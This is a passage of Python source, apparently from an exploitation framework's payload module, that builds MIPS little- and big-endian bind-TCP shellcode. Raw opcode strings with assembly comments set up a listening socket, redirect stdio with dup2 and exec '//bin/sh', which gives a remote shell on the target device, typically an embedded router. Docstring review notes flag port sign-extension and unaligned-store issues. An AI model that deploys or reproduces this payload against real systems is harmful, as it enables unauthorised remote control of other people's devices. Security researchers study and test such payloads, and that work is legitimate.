        "\xe0\xff\xad\xaf",  # sw t5,-32(sp)
        "\xe4\xff\xa0\xaf",  # sw zero,-28(sp)
        "\xe8\xff\xa0\xaf",  # sw zero,-24(sp)
        "\xec\xff\xa0\xaf",  # sw zero,-20(sp)
        # bind(s, &sockaddr, 16)
        "\x25\x20\x10\x02",  # or a0,s0,s0
        "\xef\xff\x0e\x24",  # li t6,-17
        "\x27\x30\xc0\x01",  # nor a2,t6,zero
        "\xe0\xff\xa5\x23",  # addi a1,sp,-32
        "\x49\x10\x02\x24",  # li v0,4169 ( __NR_bind )
        "\x0c\x01\x01\x01",  # syscall
        # listen(s, 257)
        "\x25\x20\x10\x02",  # or a0,s0,s0
        "\x01\x01\x05\x24",  # li a1,257
        "\x4e\x10\x02\x24",  # li v0,4174 ( __NR_listen )
        "\x0c\x01\x01\x01",  # syscall
        # accept(s, NULL, NULL)
        "\x25\x20\x10\x02",  # or a0,s0,s0
        "\xff\xff\x05\x28",  # slti a1,zero,-1
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x48\x10\x02\x24",  # li v0,4168 ( __NR_accept )
        "\x0c\x01\x01\x01",  # syscall
        # dup2(client, 2), dup2(client, 1), dup2(client, 0)
        "\xff\xff\xa2\xaf",  # sw v0,-1(sp) # socket
        "\xfd\xff\x11\x24",  # li s1,-3
        "\x27\x88\x20\x02",  # nor s1,s1,zero
        "\xff\xff\xa4\x8f",  # lw a0,-1(sp)
        "\x21\x28\x20\x02",  # move a1,s1 # dup2_loop
        "\xdf\x0f\x02\x24",  # li v0,4063 ( __NR_dup2 )
        "\x0c\x01\x01\x01",  # syscall 0x40404
        "\xff\xff\x10\x24",  # li s0,-1
        "\xff\xff\x31\x22",  # addi s1,s1,-1
        "\xfa\xff\x30\x16",  # bne s1,s0 <dup2_loop>
        # execve("//bin/sh", ["//bin/sh", NULL], NULL)
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x62\x69\x0f\x3c",  # lui t7,0x6962 "bi"
        "\x2f\x2f\xef\x35",  # ori t7,t7,0x2f2f "//"
        "\xec\xff\xaf\xaf",  # sw t7,-20(sp)
        "\x73\x68\x0e\x3c",  # lui t6,0x7368 "sh"
        "\x6e\x2f\xce\x35",  # ori t6,t6,0x2f6e "n/"
        "\xf0\xff\xae\xaf",  # sw t6,-16(sp)
        "\xf4\xff\xa0\xaf",  # sw zero,-12(sp)
        "\xec\xff\xa4\x27",  # addiu a0,sp,-20
        "\xf8\xff\xa4\xaf",  # sw a0,-8(sp)
        "\xfc\xff\xa0\xaf",  # sw zero,-4(sp)
        "\xf8\xff\xa5\x27",  # addiu a1,sp,-8
        "\xab\x0f\x02\x24",  # li v0,4011 ( __NR_execve )
        "\x0c\x01\x01\x01",  # syscall 0x40404
    )
    return "".join(opcodes)
def generate(self):
    """Build the MIPS big-endian bind TCP shell payload (port: ``self.rport``).

    Call sequence (strace-style, as annotated in the original):
    socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3;
    bind(3, {AF_INET, htons(port), 0.0.0.0}, 16); listen(3, 257);
    accept(3, 0, NULL) = 4; dup2(4, 2) / dup2(4, 1) / dup2(4, 0);
    execve("//bin/sh", ["//bin/sh"], []).  MIPS o32 syscall numbers:
    4183 socket, 4169 bind, 4174 listen, 4168 accept, 4063 dup2,
    4011 execve.  The accepted fd is parked at -1(sp), an unaligned word
    slot — NOTE(review): relies on the kernel handling unaligned sw/lw.

    Returns:
        A str of raw big-endian opcode bytes.  ``validators.convert_port`` is
        a project helper not visible here — assumed to return 2 network-order
        bytes used verbatim as the immediate of ``li t6``.  NOTE(review):
        ``addiu`` sign-extends that 16-bit immediate, so the OR into the
        sockaddr word is only clean when bit 15 of the port is clear (the
        sample 0x115c is); confirm the intended port range.
    """
    port_bytes = validators.convert_port(self.rport)
    opcodes = (
        # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
        "\x27\xbd\xff\xe0",  # addiu sp,sp,-32
        "\x24\x0e\xff\xfd",  # li t6,-3
        "\x01\xc0\x20\x27",  # nor a0,t6,zero
        "\x01\xc0\x28\x27",  # nor a1,t6,zero
        "\x28\x06\xff\xff",  # slti a2,zero,-1
        "\x24\x02\x10\x57",  # li v0,4183 ( __NR_socket )
        "\x01\x01\x01\x0c",  # syscall
        # bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
        "\x30\x50\xff\xff",  # andi s0,v0,0xffff
        "\x24\x0e\xff\xef",  # li t6,-17 ; t6: 0xffffffef
        "\x01\xc0\x70\x27",  # nor t6,t6,zero ; t6: 0x10 (16)
        "\x24\x0d\xff\xfd",  # li t5,-3 ; t5: -3
        "\x01\xa0\x68\x27",  # nor t5,t5,zero ; t5: 0x2
        "\x01\xcd\x68\x04",  # sllv t5,t5,t6 ; t5: 0x00020000
        "\x24\x0e" + port_bytes,  # li t6,<port> ; sample: 0x115c (4444, default LPORT)
        "\x01\xae\x68\x25",  # or t5,t5,t6 ; t5: 0x0002115c
        "\xaf\xad\xff\xe0",  # sw t5,-32(sp)
        "\xaf\xa0\xff\xe4",  # sw zero,-28(sp)
        "\xaf\xa0\xff\xe8",  # sw zero,-24(sp)
        "\xaf\xa0\xff\xec",  # sw zero,-20(sp)
        "\x02\x10\x20\x25",  # or a0,s0,s0
        "\x24\x0e\xff\xef",  # li t6,-17
        "\x01\xc0\x30\x27",  # nor a2,t6,zero
        "\x23\xa5\xff\xe0",  # addi a1,sp,-32
        "\x24\x02\x10\x49",  # li v0,4169 ( __NR_bind )
        "\x01\x01\x01\x0c",  # syscall
        # listen(3, 257) = 0
        "\x02\x10\x20\x25",  # or a0,s0,s0
        "\x24\x05\x01\x01",  # li a1,257
        "\x24\x02\x10\x4e",  # li v0,4174 ( __NR_listen )
        "\x01\x01\x01\x0c",  # syscall
        # accept(3, 0, NULL) = 4
        "\x02\x10\x20\x25",  # or a0,s0,s0
        "\x28\x05\xff\xff",  # slti a1,zero,-1
        "\x28\x06\xff\xff",  # slti a2,zero,-1
        "\x24\x02\x10\x48",  # li v0,4168 ( __NR_accept )
        "\x01\x01\x01\x0c",  # syscall
        # dup2(4, 2) = 2 ; dup2(4, 1) = 1 ; dup2(4, 0) = 0
        "\xaf\xa2\xff\xff",  # sw v0,-1(sp) # socket
        "\x24\x11\xff\xfd",  # li s1,-3
        "\x02\x20\x88\x27",  # nor s1,s1,zero
        "\x8f\xa4\xff\xff",  # lw a0,-1(sp)
        "\x02\x20\x28\x21",  # move a1,s1 # dup2_loop
        "\x24\x02\x0f\xdf",  # li v0,4063 ( __NR_dup2 )
        "\x01\x01\x01\x0c",  # syscall 0x40404
        "\x24\x10\xff\xff",  # li s0,-1
        "\x22\x31\xff\xff",  # addi s1,s1,-1
        "\x16\x30\xff\xfa",  # bne s1,s0 <dup2_loop>
        # execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
        "\x28\x06\xff\xff",  # slti a2,zero,-1
        "\x3c\x0f\x2f\x2f",  # lui t7,0x2f2f "//"
        "\x35\xef\x62\x69",  # ori t7,t7,0x6269 "bi"
        "\xaf\xaf\xff\xec",  # sw t7,-20(sp)
        "\x3c\x0e\x6e\x2f",  # lui t6,0x6e2f "n/"
        "\x35\xce\x73\x68",  # ori t6,t6,0x7368 "sh"
        "\xaf\xae\xff\xf0",  # sw t6,-16(sp)
        "\xaf\xa0\xff\xf4",  # sw zero,-12(sp)
        "\x27\xa4\xff\xec",  # addiu a0,sp,-20
        "\xaf\xa4\xff\xf8",  # sw a0,-8(sp)
        "\xaf\xa0\xff\xfc",  # sw zero,-4(sp)
        "\x27\xa5\xff\xf8",  # addiu a1,sp,-8
        "\x24\x02\x0f\xab",  # li v0,4011 ( __NR_execve )
        "\x01\x01\x01\x0c",  # syscall 0x40404
    )
    return "".join(opcodes)